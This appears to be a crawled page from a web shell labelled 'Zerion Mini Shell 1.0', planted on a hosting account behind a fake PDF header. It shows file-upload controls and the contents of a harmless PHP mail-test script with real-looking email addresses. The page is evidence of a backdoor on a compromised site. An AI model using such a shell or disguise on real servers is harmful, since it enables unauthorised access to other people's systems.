%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/ugotscom/public_html/
Upload File :
Create Path :
Current File : /home/ugotscom/public_html/testmail.php

<?PHP
$sender = 'info@dlabsindia.com';
$recipient = 'vipin@ugotechnologies.com';

$subject = "php mail test";
$message = "php test message";
$headers = 'From:' . $sender;

if (mail($recipient, $subject, $message, $headers))
{
    echo "Message accepted";
}
else
{
    echo "Error: Message not accepted";
}
?>

Zerion Mini Shell 1.0